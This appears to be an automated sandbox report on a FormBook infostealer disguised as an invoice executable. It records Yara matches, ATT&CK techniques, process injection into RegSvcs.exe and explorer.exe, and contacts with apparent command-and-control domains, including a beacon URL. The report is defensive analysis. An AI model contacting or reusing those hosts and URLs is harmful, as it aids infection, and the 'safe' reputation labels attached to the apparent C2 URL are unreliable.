            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Factura de proforma.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook
            Source: Yara match; file source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY
            The named .unpack entries show which process index each dump belongs to: index 6 is RegSvcs.exe (payload image at 0x400000) and index 0 is the dropper itself (raw payload regions at 0x3cc0560 and 0x3d0ff80); the remaining .sdmp entries are memory regions of processes 0, 6, 7 and 0xA matched by the same rule.

            Remote Access Functionality:

            Yara detected FormBook
            Source: Yara match; file source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 0.2.Factura de proforma.exe.3cc0560.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 0.2.Factura de proforma.exe.3d0ff80.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; file source: 00000006.00000002.402637395.0000000001500000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000007.00000000.357102552.0000000010B69000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 00000000.00000002.322614171.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.570999919.0000000000540000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match; file source: 00000006.00000002.402727602.0000000001530000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.571846259.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara match; file source: 0000000A.00000002.571574263.00000000025D0000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Techniques are listed per tactic column. A number in parentheses is the report's signature-count badge for that technique, reproduced exactly as it appears in the source (where several badges were concatenated, the digits are kept together); techniques without a number are the matrix's template entries and were not observed for this sample.

            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Scheduled Task/Job (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
            Persistence: Scheduled Task/Job (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
            Privilege Escalation: Process Injection (512); Scheduled Task/Job (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
            Defense Evasion: Rootkit (1); Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (31); Process Injection (512); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (13)
            Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (112); Network Sniffing; Network Service Scanning
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
            Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

            Behavior Graph

Behavior Graph ID: 502357, Sample: Factura de proforma.exe, Startdate: 13/10/2021, Architecture: WINDOWS, Score: 100

Sample (root)
  DNS/IP: www.new-post-vehicle-site.xyz; www.festival-du-chanvre.com
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected AntiVM3; 8 other signatures
  started: Factura de proforma.exe
    Dropped: C:\Users\user\AppData\Local\...\tmpD689.tmp (XML); C:\Users\user\AppData\...\tskpCbAwtxoaw.exe (PE32)
    started: RegSvcs.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      injected: explorer.exe
        DNS/IP: parking3.dnstool.net 13.209.99.177, 49806, 80 AMAZON-02US United States; www.palmonlae.space; www.aminobalm.com
        Signatures: System process connects to network (likely due to code injection or exploit)
        started: cscript.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          started: cmd.exe
            started: conhost.exe
    started: schtasks.exe
      started: conhost.exe

            Screenshots


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

Source | Detection | Scanner | Label
6.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://www.jiyu-kobo.co.jp/XDiUa | 0% | Avira URL Cloud | safe
http://www.fonts.comc | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.founder.com.cn/cn2U% | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn.U | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/tDMU | 0% | Avira URL Cloud | safe
http://www.aminobalm.com/cb3b/?c6=kr386M7znJup/B2j4KhdpwCgkxfUSLFq19BV4h8BDsMel0JC//DVwypubzBUvp11Q9BD&A0DXb=eZk4rh9h | 0% | Avira URL Cloud | safe
http://www.sandoll.co.krN.TTFs | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.tiro.comF | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/a-eoDFU$ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fonts.com-uT | 0% | Avira URL Cloud | safe
http://en.w | 0% | URL Reputation | safe
http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ko | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
